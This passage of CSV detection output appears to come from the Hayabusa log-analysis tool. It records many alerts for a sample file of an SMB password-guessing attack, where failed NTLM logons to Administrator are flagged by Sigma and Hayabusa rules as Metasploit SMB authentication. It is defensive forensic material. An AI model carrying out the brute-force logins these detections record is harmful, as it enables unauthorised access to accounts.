NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
